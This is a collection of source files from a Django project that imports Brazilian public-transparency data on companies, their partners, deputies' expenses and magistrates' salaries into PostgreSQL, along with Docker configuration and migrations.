"length_bytes": 543, "license_type": "no_license", "max_line_length": 76, "num_lines": 22, "path": "/empresas/migrations/0003_auto_20180504_2040.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0.4 on 2018-05-04 20:40\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('empresas', '0002_remove_empresa_unidade_federativa'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='socio',\n name='empresa_origem',\n ),\n migrations.AddField(\n model_name='socio',\n name='cpf_cnpj_socio',\n field=models.CharField(db_index=True, max_length=14, null=True),\n ),\n ]\n" }, { "alpha_fraction": 0.564434826374054, "alphanum_fraction": 0.5676745772361755, "avg_line_length": 46.06779479980469, "blob_id": "4191dc37735ef592cd610e9c2adff6697a1fe849", "content_id": "9870647ce0fcf2d445fe571ca14017b28b536172", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2780, "license_type": "no_license", "max_line_length": 141, "num_lines": 59, "path": "/empresas/management/commands/import_pessoas_juridicas.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "from datetime import datetime\nimport pandas as pd\nfrom django.core.management import BaseCommand\nfrom django.db import transaction\n\nfrom empresas.models import Empresa, Sociedade\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n parser.add_argument('csv', type=str)\n parser.add_argument('uf', type=str)\n parser.add_argument('inicio', type=int)\n\n def handle(self, *args, **options):\n uf = options['uf']\n log = open(f'{uf}_PJ_LOG.txt', 'w')\n cnpjs_nao_registrados = open(f'INVALIDOS_LOG.txt', 'a')\n\n log.write(f'{datetime.now().isoformat()} Abrindo CSV para PJ\\n')\n csv = pd.read_csv(\n options['csv'],\n chunksize=100000,\n dtype={'cpf_cnpj_socio': str, 'cnpj_empresa': str}\n )\n cnpjs_salvos = sorted(Empresa.objects.values_list('cnpj', flat=True))\n\n for contador, grupo in enumerate(csv):\n if contador >= options.get('inicio', 0):\n log.write(f'{datetime.now().isoformat()} Filtrando socios PJ do grupo {contador}\\n')\n grupo = grupo[grupo['codigo_tipo_socio'] == 1]\n sociedades = []\n\n log.write(f'{datetime.now().isoformat()} Criando empresas com cnpj invalido do grupo {contador}\\n')\n invalidos = grupo[~grupo['cpf_cnpj_socio'].isin(cnpjs_salvos)]\n for dados in invalidos.itertuples():\n cnpjs_nao_registrados.write(f'{dados.cpf_cnpj_socio};{dados.nome_socio};{uf};{dados.cnpj_empresa};{dados.nome_empresa}]')\n invalidos = invalidos.drop_duplicates(['cpf_cnpj_socio'])\n empresas_invalidas = []\n for dados in invalidos.itertuples():\n empresas_invalidas.append(Empresa(\n nome=f'INVALIDO {dados.nome_socio}',\n cnpj=dados.cpf_cnpj_socio,\n uf_id=uf,\n ))\n cnpjs_salvos.append(dados.cpf_cnpj_socio)\n Empresa.objects.bulk_create(empresas_invalidas)\n\n log.write(f'{datetime.now().isoformat()} Importando sociedades do grupo {contador}\\n')\n for dados in grupo.itertuples():\n sociedades.append(Sociedade(\n tipo_socio=1,\n qualificacao_socio=dados.codigo_qualificacao_socio,\n empresa_id=dados.cnpj_empresa,\n socio_pessoa_juridica_id=dados.cpf_cnpj_socio\n ))\n log.write(f'{datetime.now().isoformat()} Cirando Sociedades do grupo {contador}\\n')\n Sociedade.objects.bulk_create(sociedades)\n log.write(f'{datetime.now().isoformat()} Importação finalizada\\n')\n\n" }, { "alpha_fraction": 0.6619718074798584, "alphanum_fraction": 0.6807511448860168, "avg_line_length": 22.66666603088379, "blob_id": "7dbf24a3f2fcd172e85ed71cb2d3e50127ee4da7", "content_id": "3572221547a45ea92ce4996a6d9faf8c1d153326", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 213, "license_type": "no_license", "max_line_length": 60, "num_lines": 9, "path": "/comum/models.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "from django.db import models\n\n\nclass Estado(models.Model):\n sigla = models.CharField(max_length=2, primary_key=True)\n nome = models.CharField(max_length=255)\n\n def __str__(self):\n return self.nome\n" }, { "alpha_fraction": 0.7366254925727844, "alphanum_fraction": 0.748971164226532, "avg_line_length": 17.769229888916016, "blob_id": "068a9612008ccd0fe0ae8b448d77f3762410abf5", "content_id": "697ad17eeda7017c03bae073bf4cadd8900af56e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 243, "license_type": "no_license", "max_line_length": 49, "num_lines": 13, "path": "/docker/django/Dockerfile", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "FROM python:3.6\n\nENV PYTHONUNBUFFERED 1\n\nWORKDIR /app\nCOPY requirements.txt /app\nCOPY . /app\n\nRUN pip install -r requirements.txt\n\nCOPY ./docker/django/entrypoint.sh /entrypoint.sh\nRUN sed -i 's/\\r//' /entrypoint.sh\nRUN chmod +x /entrypoint.sh" }, { "alpha_fraction": 0.4671874940395355, "alphanum_fraction": 0.49687498807907104, "avg_line_length": 19.612903594970703, "blob_id": "274227f8e657ddfc0ca3fa87044d1861f33f732c", "content_id": "19363ecf84f63ee972968d4d06d380fb743ba6df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "YAML", "length_bytes": 640, "license_type": "no_license", "max_line_length": 50, "num_lines": 31, "path": "/docker-compose.yml", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "version: '2'\n\nvolumes:\n brasilio: {}\n\nservices:\n database:\n container_name: database\n restart: always\n env_file: .env\n image: postgres:9.6\n volumes:\n - brasilio:/var/lib/postgresql/data\n ports:\n - 5433:5432\n\n webserver:\n container_name: webserver\n restart: on-failure\n image: maribedran/brasilio\n build:\n context: .\n dockerfile: ./docker/django/Dockerfile\n entrypoint:\n - /entrypoint.sh\n volumes:\n - .:/app\n links:\n - database\n ports:\n - 8010:8000\n\n" }, { "alpha_fraction": 0.5427920818328857, "alphanum_fraction": 0.560852587223053, "avg_line_length": 34.73255920410156, "blob_id": "71312bb318518818d6bf55ee83a48679bbc5a993", "content_id": "b49bbdbb8009cb8d41d36698282a580304e1f3c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6188, "license_type": "no_license", "max_line_length": 101, "num_lines": 172, "path": "/empresas/models.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.db.models import Case, Count, F, OuterRef, Q, Subquery, Sum, Value, When\nfrom django.db.models.functions import Coalesce\n\n\nclass EmpresaQuerySet(models.QuerySet):\n\n def annotate_deputados(self):\n from politicos.models import Deputado\n deputados_qs = Deputado.objects.values_list('nome', flat=True)\n return self.annotate(\n deputado=Subquery(\n deputados_qs.filter(\n nome__in=OuterRef('sociedades__socio_pessoa_fisica__nome')\n )\n )\n )\n\n def annotate_deputados2(self):\n from politicos.models import Deputado\n deputados_qs = Deputado.objects.values_list('nome', flat=True)\n return self.annotate(\n deputado=Q(sociedades__socio_pessoa_fisica__nome__in=deputados_qs)\n )\n\n def annotate_graus_sociedades(self, grau):\n lookups = lambda x: '__'.join(['participacoes_sociedades__socio_pessoa_juridica'] * x)\n annotate_graus_sociedades = {\n f'grau_{n}': Coalesce(\n Sum(\n Case(\n When(\n Q(**{f'{lookups(n)}__isnull': False})\n &\n ~Q(**{f'{lookups(n)}': F(f'{lookups(n - 1)}' if n - 1 else 'cnpj')})\n &\n ~Q(**{f'{lookups(n)}': F(f'{lookups(n - 2)}' if n - 2 > 0 else 'cnpj')}),\n then=Value(1)\n ),\n output_field=models.IntegerField(),\n )\n ),\n 0,\n )\n for n in range(1, grau + 1)\n }\n return self.annotate(**annotate_graus_sociedades)\n\n def annotate_graus_sociedades2(self, grau):\n lookups = lambda x: '__'.join(['participacoes_sociedades__socio_pessoa_juridica'] * x)\n annotate_graus_sociedades = {\n f'grau_{n}': Count(\n Q(**{f'{lookups(n)}__isnull': False})\n &\n ~Q(**{f'{lookups(n)}': F(f'{lookups(n - 1)}' if n - 1 else 'cnpj')})\n &\n ~Q(**{f'{lookups(n)}': F(f'{lookups(n - 2)}' if n - 2 > 0 else 'cnpj')}),\n then=Value(1)\n )\n for n in range(1, grau + 1)\n }\n return self.annotate(**annotate_graus_sociedades)\n\n\n\nclass Empresa(models.Model):\n cnpj = models.CharField(max_length=14, primary_key=True)\n nome = models.CharField(max_length=255, null=True, db_index=True)\n uf = models.ForeignKey(\n 'comum.Estado',\n db_index=True,\n related_name='empresas',\n on_delete=models.PROTECT,\n )\n\n objects = EmpresaQuerySet.as_manager()\n\n\nclass PessoaFisica(models.Model):\n nome = models.CharField(max_length=255, null=True, db_index=True)\n\n\nclass Estrangeiro(models.Model):\n nome = models.CharField(max_length=255, null=True, db_index=True)\n\n\nclass Sociedade(models.Model):\n TIPOS_SOCIO = (\n (1, 'Pessoa Jurídica'),\n (2, 'Pessoa Física'),\n (3, 'Nome Exterior'),\n )\n QUALIFICACOES_SOCIO = (\n (5, 'Administrador'),\n (8, 'Conselheiro de Administração'),\n (10, 'Diretor'),\n (16, 'Presidente'),\n (17, 'Procurador'),\n (20, 'Sociedade Consorciada'),\n (21, 'Sociedade Filiada'),\n (22, 'Sócio'),\n (23, 'Sócio Capitalista'),\n (24, 'Sócio Comanditado'),\n (25, 'Sócio Comanditário'),\n (26, 'Sócio de Indústria'),\n (28, 'Sócio-Gerente'),\n (29, 'Sócio Incapaz ou Relat.Incapaz (exceto menor)'),\n (30, 'Sócio Menor (Assistido/Representado)'),\n (31, 'Sócio Ostensivo'),\n (37, 'Sócio Pessoa Jurídica Domiciliado no Exterior'),\n (38, 'Sócio Pessoa Física Residente no Exterior'),\n (47, 'Sócio Pessoa Física Residente no Brasil'),\n (48, 'Sócio Pessoa Jurídica Domiciliado no Brasil'),\n (49, 'Sócio-Administrador'),\n (52, 'Sócio com Capital'),\n (53, 'Sócio sem Capital'),\n (54, 'Fundador'),\n (55, 'Sócio Comanditado Residente no Exterior'),\n (56, 'Sócio Comanditário Pessoa Física Residente no Exterior'),\n (57, 'Sócio Comanditário Pessoa Jurídica Domiciliado no Exterior'),\n (58, 'Sócio Comanditário Incapaz'),\n (59, 'Produtor Rural'),\n (63, 'Cotas em Tesouraria'),\n (65, 'Titular Pessoa Física Residente ou Domiciliado no Brasil'),\n (66, 'Titular Pessoa Física Residente ou Domiciliado no Exterior'),\n (67, 'Titular Pessoa Física Incapaz ou Relativamente Incapaz (exceto menor)'),\n (68, 'Titular Pessoa Física Menor (Assistido/Representado)'),\n (70, 'Administrador Residente ou Domiciliado no Exterior'),\n (71, 'Conselheiro de Administração Residente ou Domiciliado no Exterior'),\n (72, 'Diretor Residente ou Domiciliado no Exterior'),\n (73, 'Presidente Residente ou Domiciliado no Exterior'),\n (74, 'Sócio-Administrador Residente ou Domiciliado no Exterior'),\n (75, 'Fundador Residente ou Domiciliado no Exterior'),\n )\n\n tipo_socio = models.PositiveSmallIntegerField(\n choices=TIPOS_SOCIO,\n null=True,\n db_index=True\n )\n qualificacao_socio = models.PositiveSmallIntegerField(\n choices=QUALIFICACOES_SOCIO,\n null=True\n )\n empresa = models.ForeignKey(\n Empresa,\n related_name='sociedades',\n null=True,\n on_delete=models.PROTECT,\n db_index=True\n )\n socio_pessoa_juridica = models.ForeignKey(\n Empresa,\n related_name='participacoes_sociedades',\n null=True,\n on_delete=models.PROTECT,\n db_index=True\n )\n socio_pessoa_fisica = models.ForeignKey(\n PessoaFisica,\n related_name='participacoes_sociedades',\n null=True,\n on_delete=models.PROTECT,\n db_index=True\n )\n socio_estrangeiro = models.ForeignKey(\n Estrangeiro,\n related_name='participacoes_sociedades',\n null=True,\n on_delete=models.PROTECT,\n db_index=True\n )\n" }, { "alpha_fraction": 0.5697036385536194, "alphanum_fraction": 0.5735455751419067, "avg_line_length": 38.58695602416992, "blob_id": "56eaf8ea1bd5bf8e5c6e06f470a6e63fe1c93625", "content_id": "718e805e935c02bee61410beabd0077bfdddd1a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1822, "license_type": "no_license", "max_line_length": 122, "num_lines": 46, "path": "/empresas/management/commands/import_empresas.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "import bisect\nfrom datetime import datetime\nimport pandas as pd\nfrom django.core.management import BaseCommand\nfrom django.db import transaction\n\nfrom empresas.models import Empresa\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n parser.add_argument('csv', type=str)\n parser.add_argument('uf', type=str)\n parser.add_argument('inicio', type=int)\n\n def handle(self, *args, **options):\n uf = options['uf']\n log = open(f'{uf}_EMPRESAS_LOG.txt', 'w')\n\n cnpjs_salvos = sorted(Empresa.objects.values_list('cnpj', flat=True))\n\n log.write(f'{datetime.now().isoformat()} Abrindo CSV para {uf}\\n')\n csv = pd.read_csv(\n options['csv'],\n chunksize=100000,\n dtype={'cpf_cnpj_socio': str, 'cnpj_empresa': str}\n )\n\n for contador, grupo in enumerate(csv):\n if contador >= options.get('inicio', 0):\n log.write(f'{datetime.now().isoformat()} Removendo duplicatas de empresas do grupo {contador} do {uf}\\n')\n grupo = grupo.drop_duplicates(['cnpj_empresa'], keep='first')\n grupo = grupo[~grupo['cnpj_empresa'].isin(cnpjs_salvos)]\n\n log.write(f'{datetime.now().isoformat()} Importando dados de empresas do grupo {contador} do {uf}\\n')\n empresas = []\n for dados in grupo.itertuples():\n empresas.append(Empresa(\n cnpj=dados.cnpj_empresa,\n nome=dados.nome_empresa,\n uf_id=uf\n ))\n bisect.insort(cnpjs_salvos, dados.cnpj_empresa)\n\n log.write(f'{datetime.now().isoformat()} Cirando Empresas do grupo {contador} do {uf}\\n')\n Empresa.objects.bulk_create(empresas)\n\n" }, { "alpha_fraction": 0.5460454821586609, "alphanum_fraction": 0.5872156023979187, "avg_line_length": 34.5, "blob_id": "0f44bc291a659259d09307f9d0155861c842acc3", "content_id": "ccc58426a5529fc4b7538200279ce93d3e925c5c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 923, "license_type": "no_license", "max_line_length": 116, "num_lines": 26, "path": "/politicos/migrations/0003_deputado.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0.4 on 2018-05-04 18:56\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('comum', '0001_initial'),\n ('politicos', '0002_auto_20180504_1821'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Deputado',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('id_camara', models.IntegerField()),\n ('nome', models.CharField(max_length=255)),\n ('id_legislatura', models.IntegerField()),\n ('partido', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='politicos.Partido')),\n ('uf', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='comum.Estado')),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.581818163394928, "alphanum_fraction": 0.6034091114997864, "avg_line_length": 30.428571701049805, "blob_id": "638486f5df781792c480fc9a486be3fde831f6a5", "content_id": "73c556a644dc5a00a3d923c97ca99a4bc12c7de0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 880, "license_type": "no_license", "max_line_length": 109, "num_lines": 28, "path": "/empresas/migrations/0006_auto_20180513_0541.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0.4 on 2018-05-13 05:41\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('empresas', '0005_empresa_uf'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='empresa',\n name='empresas',\n field=models.ManyToManyField(db_index=True, through='empresas.Sociedade', to='empresas.Empresa'),\n ),\n migrations.AlterField(\n model_name='estrangeiro',\n name='empresas',\n field=models.ManyToManyField(db_index=True, through='empresas.Sociedade', to='empresas.Empresa'),\n ),\n migrations.AlterField(\n model_name='pessoafisica',\n name='empresas',\n field=models.ManyToManyField(db_index=True, through='empresas.Sociedade', to='empresas.Empresa'),\n ),\n ]\n" }, { "alpha_fraction": 0.6685123443603516, "alphanum_fraction": 0.6864771842956543, "avg_line_length": 46.51462173461914, "blob_id": "c35bd016c9759cc22d36eeaaa61a44c6082b1f1d", "content_id": "083abbdc2fa32a48c9de1e708e14e7e4a240091e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8127, "license_type": "no_license", "max_line_length": 100, "num_lines": 171, "path": "/empresas/_models.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "from django.db import models\n\n\nclass GastosDeputados(models.Model):\n # Deputado\n codlegislatura = models.IntegerField(null=True)\n # Gasto\n datemissao = models.DateTimeField(null=True)\n idedocumento = models.IntegerField(null=True)\n idecadastro = models.IntegerField(null=True)\n indtipodocumento = models.IntegerField(null=True)\n # Deputado\n nucarteiraparlamentar = models.IntegerField(null=True)\n nudeputadoid = models.IntegerField(null=True)\n nulegislatura = models.IntegerField(null=True)\n # Gasto\n numano = models.IntegerField(null=True)\n numespecificacaosubcota = models.IntegerField(null=True)\n numlote = models.IntegerField(null=True)\n nummes = models.IntegerField(null=True)\n numparcela = models.IntegerField(null=True)\n numressarcimento = models.IntegerField(null=True)\n numsubcota = models.IntegerField(null=True)\n # Deputado\n sgpartido = models.CharField(max_length=18, null=True)\n sguf = models.CharField(max_length=2, null=True)\n txnomeparlamentar = models.CharField(max_length=63, null=True)\n # Gasto\n txtcnpjcpf = models.CharField(max_length=14, null=True)\n txtdescricao = models.CharField(max_length=127, null=True)\n txtdescricaoespecificacao = models.CharField(max_length=31, null=True)\n txtfornecedor = models.CharField(max_length=255, null=True)\n txtnumero = models.CharField(max_length=63, null=True)\n txtpassageiro = models.CharField(max_length=63, null=True)\n txttrecho = models.CharField(max_length=127, null=True)\n vlrdocumento = models.DecimalField(null=True, max_digits=8, decimal_places=2)\n vlrglosa = models.DecimalField(null=True, max_digits=8, decimal_places=2)\n vlrliquido = models.DecimalField(null=True, max_digits=8, decimal_places=2)\n vlrrestituicao = models.DecimalField(null=True, max_digits=8, decimal_places=2)\n\n class Meta:\n indexes = [\n models.Index(fields=['-datemissao']),\n models.Index(fields=['datemissao']),\n models.Index(fields=['idedocumento']),\n models.Index(fields=['numressarcimento']),\n models.Index(fields=['sgpartido']),\n models.Index(fields=['sguf']),\n models.Index(fields=['txnomeparlamentar']),\n models.Index(fields=['txtcnpjcpf']),\n models.Index(fields=['txtdescricao']),\n models.Index(fields=['txtdescricaoespecificacao']),\n models.Index(fields=['txtfornecedor']),\n models.Index(fields=['vlrliquido']),\n ]\n ordering = ['-datemissao']\n\n\nclass SalariosMagistrados(models.Model):\n # Magistrado\n lotacao = models.CharField(max_length=255, null=True)\n cargo = models.CharField(max_length=63, null=True)\n cpf = models.CharField(max_length=11, null=True)\n # Salario\n data_de_publicacao = models.DateField(null=True)\n descontos_diversos = models.DecimalField(max_digits=12, null=True, decimal_places=2)\n diarias = models.DecimalField(max_digits=12, null=True, decimal_places=2)\n direitos_eventuais = models.DecimalField(max_digits=12, null=True, decimal_places=2)\n direitos_pessoais = models.DecimalField(max_digits=12, null=True, decimal_places=2)\n imposto_de_renda = models.DecimalField(max_digits=12, null=True, decimal_places=2)\n indenizacoes = models.DecimalField(max_digits=12, null=True, decimal_places=2)\n mesano_de_referencia = models.DateField(null=True)\n # Magistrado\n nome = models.CharField(max_length=63, null=True)\n orgao = models.CharField(max_length=63, null=True)\n # Salario\n previdencia_publica = models.DecimalField(max_digits=12, null=True, decimal_places=2)\n remuneracao_do_orgao_de_origem = models.DecimalField(max_digits=12, null=True, decimal_places=2)\n rendimento_liquido = models.DecimalField(max_digits=12, null=True, decimal_places=2)\n retencao_por_teto_constitucional = models.DecimalField(max_digits=12, null=True, decimal_places=\n 2)\n subsidio = models.DecimalField(max_digits=12, null=True, decimal_places=2)\n total_de_descontos = models.DecimalField(max_digits=12, null=True, decimal_places=2)\n total_de_rendimentos = models.DecimalField(max_digits=12, null=True, decimal_places=2)\n tribunal = models.CharField(max_length=127, null=True)\n url = models.CharField(max_length=2000, null=True)\n\n class Meta:\n indexes = [\n models.Index(fields=['cargo']),\n models.Index(fields=['mesano_de_referencia']),\n models.Index(fields=['nome']),\n models.Index(fields=['orgao']),\n models.Index(fields=['rendimento_liquido']),\n models.Index(fields=['retencao_por_teto_constitucional']),\n models.Index(fields=['total_de_rendimentos']),\n models.Index(fields=['tribunal']),\n ]\n ordering = ['tribunal', 'nome']\n\n\nclass SociosBrasil(models.Model):\n # Empresa\n cnpj_empresa = models.CharField(max_length=14, null=True)\n nome_empresa = models.CharField(max_length=255, null=True)\n codigo_tipo_socio = models.IntegerField(null=True)\n tipo_socio = models.CharField(max_length=15, null=True)\n # Socio\n cpf_cnpj_socio = models.CharField(max_length=14, null=True)\n # Empresa\n codigo_qualificacao_socio = models.IntegerField(null=True)\n qualificacao_socio = models.CharField(max_length=127, null=True)\n # Socio\n nome_socio = models.CharField(max_length=255, null=True)\n # Empresa\n unidade_federativa = models.CharField(max_length=2, null=True)\n\n class Meta:\n indexes = [\n models.Index(fields=['cnpj_empresa']),\n models.Index(fields=['nome_empresa']),\n models.Index(fields=['nome_socio']),\n models.Index(fields=['unidade_federativa']),\n ]\n ordering = ['cnpj_empresa', 'nome_socio']\n\n\nclass GastosDiretos(models.Model):\n ano = models.IntegerField(null=True)\n codigo_acao = models.CharField(max_length=4, null=True)\n codigo_elemento_despesa = models.IntegerField(null=True)\n codigo_favorecido = models.CharField(max_length=112, null=True)\n codigo_funcao = models.IntegerField(null=True)\n codigo_grupo_despesa = models.IntegerField(null=True)\n codigo_orgao = models.IntegerField(null=True)\n codigo_orgao_superior = models.IntegerField(null=True)\n codigo_programa = models.IntegerField(null=True)\n codigo_subfuncao = models.IntegerField(null=True)\n codigo_unidade_gestora = models.IntegerField(null=True)\n data_pagamento = models.DateField(null=True)\n data_pagamento_original = models.CharField(max_length=112, null=True)\n gestao_pagamento = models.CharField(max_length=112, null=True)\n linguagem_cidada = models.CharField(max_length=199, null=True)\n mes = models.IntegerField(null=True)\n nome_acao = models.CharField(max_length=247, null=True)\n nome_elemento_despesa = models.CharField(max_length=113, null=True)\n nome_favorecido = models.CharField(max_length=208, null=True)\n nome_funcao = models.CharField(max_length=21, null=True)\n nome_grupo_despesa = models.CharField(max_length=25, null=True)\n nome_orgao = models.CharField(max_length=45, null=True)\n nome_orgao_superior = models.CharField(max_length=45, null=True)\n nome_programa = models.CharField(max_length=110, null=True)\n nome_subfuncao = models.CharField(max_length=50, null=True)\n nome_unidade_gestora = models.CharField(max_length=45, null=True)\n numero_documento = models.CharField(max_length=112, null=True)\n valor = models.DecimalField(max_digits=18, null=True, decimal_places=2)\n\n class Meta:\n indexes = [\n models.Index(['-data_pagamento']),\n models.Index(['codigo_favorecido']),\n models.Index(['nome_elemento_despesa']),\n models.Index(['nome_favorecido']),\n models.Index(['nome_funcao']),\n models.Index(['nome_grupo_despesa']),\n models.Index(['nome_orgao_superior']),\n models.Index(['nome_subfuncao']),\n models.Index(['nome_unidade_gestora']),\n models.Index(['valor']),\n ]\n ordering = ['-data_pagamento', 'nome_favorecido']\n\n\n" }, { "alpha_fraction": 0.5547826290130615, "alphanum_fraction": 0.6156522035598755, "avg_line_length": 26.380952835083008, "blob_id": "5fb12d48cbd82204dca649efa82034689b59c14a", "content_id": "aaaec57ec8b53f988605b0f27272f9b3a34fa72c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 575, "license_type": "no_license", "max_line_length": 139, "num_lines": 21, "path": "/empresas/migrations/0005_empresa_uf.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0.4 on 2018-05-07 20:43\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('comum', '0001_initial'),\n ('empresas', '0004_auto_20180507_1717'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='empresa',\n name='uf',\n field=models.ForeignKey(default='ND', on_delete=django.db.models.deletion.PROTECT, related_name='empresas', to='comum.Estado'),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 0.5598944425582886, "alphanum_fraction": 0.5656992197036743, "avg_line_length": 42.04545593261719, "blob_id": "c5653e2e55909309954f0aa8254b0872f2cd7d48", "content_id": "79b0da66e90c2bf28cab66d45de216883821f87a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1895, "license_type": "no_license", "max_line_length": 101, "num_lines": 44, "path": "/empresas/management/commands/import_pessoas_fisicas.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "from datetime import datetime\nimport pandas as pd\nfrom django.core.management import BaseCommand\nfrom django.db import transaction\n\nfrom empresas.models import PessoaFisica, Sociedade\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n parser.add_argument('csv', type=str)\n parser.add_argument('inicio', type=int)\n\n def handle(self, *args, **options):\n log = open('PF_LOG.txt', 'w')\n\n log.write(f'{datetime.now().isoformat()} Abrindo CSV\\n')\n csv = pd.read_csv(\n options['csv'],\n chunksize=100000,\n dtype={'cpf_cnpj_socio': str, 'cnpj_empresa': str}\n )\n\n pessoa_id = 1\n for contador, grupo in enumerate(csv):\n if contador >= options.get('inicio', 0):\n log.write(f'{datetime.now().isoformat()} Filtrando socios PF do grupo {contador}\\n')\n grupo = grupo[grupo['codigo_tipo_socio'] == 2]\n sociedades = []\n pessoas = []\n log.write(f'{datetime.now().isoformat()} Importando dados do grupo {contador}\\n')\n for indice, dados in enumerate(grupo.itertuples()):\n pessoas.append(PessoaFisica(nome=dados.nome_socio, id=pessoa_id))\n sociedades.append(Sociedade(\n tipo_socio=2,\n qualificacao_socio=dados.codigo_qualificacao_socio,\n empresa_id=dados.cnpj_empresa,\n socio_pessoa_fisica_id=pessoa_id\n ))\n pessoa_id += 1\n log.write(f'{datetime.now().isoformat()} Cirando PFs do grupo {contador}\\n')\n PessoaFisica.objects.bulk_create(pessoas)\n log.write(f'{datetime.now().isoformat()} Cirando Sociedades do grupo {contador}\\n')\n Sociedade.objects.bulk_create(sociedades)\n\n" }, { "alpha_fraction": 0.6141732335090637, "alphanum_fraction": 0.6358267664909363, "avg_line_length": 27.22222137451172, "blob_id": "4d68f7a927c933efb72fd128fe2685ef764cd74e", "content_id": "26d342724ebf79961d743edf728e79fe1e5c9563", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 508, "license_type": "no_license", "max_line_length": 66, "num_lines": 18, "path": "/politicos/graficos.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "import matplotlib.pylab as plt\n\nfrom politicos.models import Deputado\n\ndef chunks(l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in range(0, len(l), n):\n yield l[i:i + n]\n\ndef graficos_gasto_mensal():\n media_mensal = Deputado.objects.get_media_mensal()\n\n dados = sorted(media_mensal.items())\n\n eixo_x = ['/'.join(dado[0].split('_')[1:3]) for dado in dados]\n eixo_y = [dado[1] if dado[1] else 0 for dado in dados]\n\n return zip(chunks(eixo_x, 12), chunks(eixo_y, 12))\n" }, { "alpha_fraction": 0.5844535231590271, "alphanum_fraction": 0.5897136330604553, "avg_line_length": 39.71428680419922, "blob_id": "11fc6235f009bdf51d56da0cd559cf696acc43df", "content_id": "870236799459d4bc14184c13ba7f108f32a59865", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1711, "license_type": "no_license", "max_line_length": 113, "num_lines": 42, "path": "/empresas/management/commands/import_estrangeiros.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "import bisect\nfrom datetime import datetime\nimport pandas as pd\nimport numpy as np\nimport csv\nfrom django.core.management import BaseCommand\nfrom django.db import transaction\n\nfrom empresas.models import Estrangeiro, Sociedade\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n parser.add_argument('csv', type=str)\n parser.add_argument('inicio', type=int)\n\n def handle(self, *args, **options):\n log = open('ESTRANGEIROS_LOG.txt', 'w')\n\n log.write(f'{datetime.now().isoformat()} Abrindo CSV\\n')\n csv = pd.read_csv(\n options['csv'],\n chunksize=100000,\n dtype={'cpf_cnpj_socio': str, 'cnpj_empresa': str}\n )\n\n for contador, grupo in enumerate(csv):\n if contador >= options.get('inicio', 0):\n log.write(f'{datetime.now().isoformat()} Filtrando socios estrangeiros do grupo {contador}\\n')\n grupo = grupo[grupo['codigo_tipo_socio'] == 3]\n sociedades = []\n log.write(f'{datetime.now().isoformat()} Inserindo dados de estrangeiros do grupo {contador}\\n')\n for dados in grupo.itertuples():\n estrangeiro = Estrangeiro.objects.create(nome=dados.nome_socio)\n sociedades.append(Sociedade(\n tipo_socio=3,\n qualificacao_socio=dados.codigo_qualificacao_socio,\n empresa_id=dados.cnpj_empresa,\n socio_estrangeiro=estrangeiro\n ))\n log.write(f'{datetime.now().isoformat()} Cirando Sociedades do grupo {contador}\\n')\n Sociedade.objects.bulk_create(sociedades)\n\n" }, { "alpha_fraction": 0.5625413656234741, "alphanum_fraction": 0.5833885073661804, "avg_line_length": 48.540985107421875, "blob_id": "128e890060a3a1a7b8e6fb8afed1be31eaf2a1bd", "content_id": "87ff7e687c4e4d7f0343107151d18624446ad932", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3022, "license_type": "no_license", "max_line_length": 140, 